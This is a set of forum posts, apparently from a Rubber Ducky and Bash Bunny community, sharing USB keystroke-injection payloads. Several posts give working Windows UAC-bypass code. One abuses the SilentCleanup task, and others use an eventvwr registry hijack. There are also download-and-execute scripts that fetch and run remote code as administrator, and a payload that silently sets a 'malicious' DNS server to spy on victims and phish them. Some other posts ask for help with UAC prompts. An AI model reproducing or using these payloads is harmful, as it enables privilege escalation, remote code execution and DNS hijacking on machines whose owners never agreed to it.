Search the Community

In theory, this bash bunny script should make a directory in C:\Windows called uac-bypassed I have no way to test this specific script because I don't have a bash bunny or a rubber ducky, so I had to make do with a P4wnP1 A.L.O.A. any help making this payload smaller would be greatly appreciated. (The command at the bottom is for the P4wnP1 A.L.O.A) Q GUI R Q powershell Q ENTER Q DELAY 500 Q "echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1" Q ENTER Q Set-ExecutionPolicy RemoteSigned -Scope CurrentUser Q ENTER Q DELAY 500 Q a Q .\\uac.ps1 Q ENTER Q rmdir uac.ps1 Q ENTER Q Set-ExecutionPolicy Undefined -Scope CurrentUser Q ENTER Q DELAY 500 Q a Q ENTER Q exit Q ENTER P4wnP1_cli hid run -c 'layout("us"); typingSpeed(15,0); press("GUI R"); type("powershell"); press("ENTER"); delay(500); type(" echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type(".\\uac.ps1"); press("ENTER"); type("rmdir uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy Undefined -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type("exit"); press("ENTER");'

Hi everyone! First of all, sorry if my English is not that good, It's not my main language. I just signed up to the forum to post this, after watching the video Darren made about a payload that changes the Desktop background. I had this idea after he mentioned that the Lockscreen background could not be changed due to the fact that there isn't a "stable" method and it needed admin privileges. So I made a script which, when opened as standard user, respawns itself in a hidden window with full admin privileges and executes whatever payload you put in it. Here it is: if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) { #Payload goes here #It'll run as Administrator } else { $registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-ItemProperty -Path $registryPath -Name $name -Value $Value #Depending on the performance of the machine, some sleep time may be required before or after schtasks schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null Remove-ItemProperty -Path $registryPath -Name $name } Explanation: There's a task in Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\system32\cleanmgr.exe Since it runs as Users, and we can control user's environment variables, we can change %windir% (normally pointing to C:\Windows) to point to whatever we want, and it'll run as admin. The first line if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) basically checks if we are admin, so that the script can detect whether it has been called by the user or by the task, and do stuff accordingly. Everything that need admin privs goes in this block of the if statement, while in the "else" block goes what can be run as standard user, including the bypass itself. The "Set-ItemProperty" line creates a new Registry Key "HKCU:\Environment\windir" in order to change the %windir% variable value to the command we want to be run as admin, in this case powershell -ep bypass -w h $PSCommandPath;# "$PSCommandPath" evaluates to our script path, "-ep bypass" is equal to "-ExecutionPolicy bypass" and "-w h" to "-WindowStyle hidden". The ";#" part is needed to comment out the rest of the path of the task from the command. So, in the end, the task's execution path evaluates to: powershell -ExecutionPolicy bypass -WindowStyle hidden <path of the script> ;#\System32\cleanmgr.exe The "schtasks" command will simply ask Windows to run the task with the now modified %windir% and "Remove-ItemProperty" will just delete the reg key after the task has been executed in order to not break other things and/or leave traces of the "attack". When the task runs, it will call the script with full fledged admin privs, so now the first block of the if statement is executed and our payload can do whatever we want. Note: In order to work, the code must be saved in a script file somewhere, it cannot be run directly from powershell or from the run dialog. However, if our payload is small enough to fit entirely in the %windir% variable, we can reduce the whole script to just the three fundamental lines, i.e. "Set-ItemProperty", "schtasks" and "Remove-ItemProperty". (Idk if it can fit in the run dialog though) Note2: I think it could break if the the script is in a path that contains spaces, but I think it's easily fixable by escaping the $PSCommandPath in the $Value variable

I just got my new Ducky today but I'm getting no love with anything else but Hello World :( The problem seems to be the UAC security. I'm using Windows 7. The command ALT y does not work. It's not a delay issue, I played with that to all extents. It seems to be a focus problem where the ALT y is being sent to another window as the UAC Window does not have focus when it pops up. Am I the only one with this issue? Is there a reliable work around to bring focus to a specific window or anther fix? Without being able to get passed the UAC check, the Ducky would be rather Sucky. No offense, it's a cool gadget, I couldn't stop the rhyme! Thanks Steve

Hello! This is my first post and contribute to this community, one of hopefully many. I am yet to receive my rubber ducky, so while waiting i thought i give writing some scripts a go. I consider the rubber ducky to be the mother of physical access exploits, being able to deploy anything in a very short period of time. DELAY 750 GUI r DELAY 1000 STRING powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://myhost.com/script.txt', '%temp%/run.vbs') ;Start-Process '%temp%/run.vbs'}" DELAY 500 ENTER Above is a basic rubber ducky script that downloads and executes a .vbs script in one line using the "run" prompt in windows. Nothing fancy, fast and easy download and execute, however we are taking this a bit further. (This is the part i cannot yet test myself due to me not having the Rubber ducky at hand, however based on examples, this should be OK, please confirm if you have time) To get maximum speed we are using a 2 step process, getting a low sized script file is much faster then going to the payload itself straight away. This is the script.txt (run.vbs when saved) Sub Main() 'Setting some vars fileurl = "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe" filename = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "/pt.exe" 'Download function dim shellobj set shellobj = wscript.createobject("wscript.shell") strlink = fileurl strsaveto = filename set objhttpdownload = createobject("msxml2.xmlhttp" ) objhttpdownload.open "get", strlink, false objhttpdownload.send set objfsodownload = createobject ("scripting.filesystemobject") if objfsodownload.fileexists (strsaveto) then objfsodownload.deletefile (strsaveto) end if if objhttpdownload.status = 200 then dim objstreamdownload set objstreamdownload = createobject("adodb.stream") with objstreamdownload .type = 1 .open .write objhttpdownload.responsebody .savetofile strsaveto .close end with set objstreamdownload = nothing end if 'UAC bypass/exploit setup Set WshShell = CreateObject("WScript.Shell") myKey = "HKCU\Software\Classes\mscfile\shell\open\command\" WshShell.RegWrite myKey,filename ,"REG_SZ" 'UAC bypass/exploit trigger CreateObject("WScript.Shell").Run "eventvwr.exe" WScript.Sleep 1000 'UAC bypass/exploit cleanup Set objShell = Wscript.CreateObject("Wscript.Shell") objShell.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\" 'Cleanup removal of this script after completed Set Cleanup = WScript.CreateObject("WScript.Shell") Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True End Sub 'We dont want to display any errors On Error Resume Next Main If Err.Number Then 'on error cleanup and exit set Cleanup = WScript.CreateObject("WScript.Shell") Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True WScript.Quit 4711 End If I have commented this to my best ability. its pretty straight forward and is about 2kb in size It download and executes (in this case putty) as pt.exe in the temp folder of the current windows user. It then proceeds to write the payload file-path as a string value to "HKCU\Software\Classes\mscfile\shell\open\command\", we then trigger "eventvwr.exe" which is a built in windows application, this will launch our payload (pt.exe) as ADMIN on the targeted machine without any form of UAC prompt prompting the user. We then remove the reg-key to avoid issues in the future followed by the vbs script removing itself from the computer leaving little trace. If any point we get an error we also remove the script. . This method of bypassing UAC giving admin rights to any application using the path written as a string in the reg-key works on all versions of windows(From where the UAC system was introduced ofc) as far up as Windows 10 Pro 64Bit Build 1607. Basically 90% of machines. I hope you all enjoyed this, i will be making a short demo video of this to see the deployment speed when i receive my copy of the rubber ducky. Best Regards ~skiddie

This is a payload mainly based of the UAC bypassing download and execute payload generator i released not so long ago I strongly suggest you check that out first. https://www.youtube.com/watch?v=fmRRX7-G4lc https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky So the goal of this payload is to add a new primary "malicious" DNS server for all active networks devices on any windows computer, to do this we use the UAC bypass method used in the above payload , but in a different payload (also in the same "Visual basic " script format) The "gain" from this would be to surveillance DNS requests and/or setup phishing websites targeted/customized for those requests/victim. So for the ducky script we are going to be using the following code DELAY 1000 GUI r DELAY 100 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('[SOURCE]', '%temp%/[NAME]'); %temp%/[NAME] ENTER You wanna replace the "[NAME]" with a random name value ending in the .vbs extensions (Example: update.vbs) You wanna replace the [SOURCE] with the URL for the stager payload source(below) preferably hosted on paste-bin (Example: http://www.pastebin.com/raw/NEyDVtER ) <- /raw/ is IMPORTANT) Here is the .vbs payload. Dim objWMIService, objShell, colItems, objItem Set objShell = CreateObject("Wscript.Shell") Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapter WHERE NetConnectionStatus = 2") 'For each active network adapter For Each objItem in colItems 'Write UAC bypass regkey with the cmd command as value CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "cmd /c netsh interface ipv4 set dns " + chr(34) + objItem.NetConnectionID + chr(34) + " static X.X.X.X primary" ,"REG_SZ" 'Trigger UAC bypass CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true 'Reset regkey GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\","" Next Here you wanna replace "X.X.X.X" with your malicious DNS server. If you need help setting up the DNS server you can have a look at this tutorial -> https://blog.heckel.xyz/2013/07/18/how-to-dns-spoofing-with-a-simple-dns-server-using-dnsmasq/ This again just show how fast,effective,invisible and powerless staged payloads for the rubber ducky is, especially with the UAC bypass integrated . Also, from what i can tell this bypasses all av's... Best Regards ~Skiddie

This is my official release of my UAC bypassing Rubber Ducky payload generator "UAC-DUCK". Download and execute any binary executable on any windows machine with UAC enabled as administrator WITHOUT prompting the user to elevate privileges . Its a 3 second download and execute with admin access. Generator written in Python so it's cross compatible with Windows and Linux. Github: https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky Full demo: http://sendvid.com/uh6i317i It uses a simple 2 stage process Stage 1: Stage one is the script that is triggered when the ducky is connected to any targeted windows machine. It will execute an powerful one-liner inside the "run" dialog of the system. The one liner is a simple powershell script, that when executes instantly hides then powershell windows and runs it the background. The powershell script downloads and execute our stage 2 .vbs payload in the %temp% directory Stage 2: Once your .vbs payload is on the system, we proceed to download our main binary payload. The .vbs script exploits a flaw in the windows registry system, this allows us to execute any binary file on the system with admin privilege without prompting the user for access (UAC). My Twitter: https://twitter.com/SkiddieTech

Hi I'm new and just got my Rubber Ducky. Why can't I bypass UAC? Am I doing something wrong? It pops up with the UAC password prompt screen. "Do you want to allow the following program to make changes to this computer?" and then it asks for the password. Here's the code I'm using. GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 3000 ALT y DELAY 500 STRING echo Admin Prompt in 5 seconds This doesn't work either DELAY 200 STRING cmd DELAY 200 MENU DELAY 100 STRING a ENTER DELAY 200 LEFT ENTER I'm running Windows 7 SP1

Hello gentleman, Sorry in advance if this issue have been answered before, I was searching the forum for some information and did´nt found something that clarify my needs. I am doing my first tests with ducky in some Windows 7 / 8 machines. What I noticed was that in both English and Portuguese (pt-br) systems, when I can the command "powershell Start-Process cmd -Verb runAs" As you can see, when UAC prompt appears, Windows Powershell continues to have the focus, so I can´t submit the command "ALT S" (equivalent to ALT Y on English systems) to the UAC window and go on with my Command Quacking. In another thread I see a friend of the forum saying that solved using "GUI TAB" command, but over here this is not working. Some of you know how I can go ahead to solve this? Ty!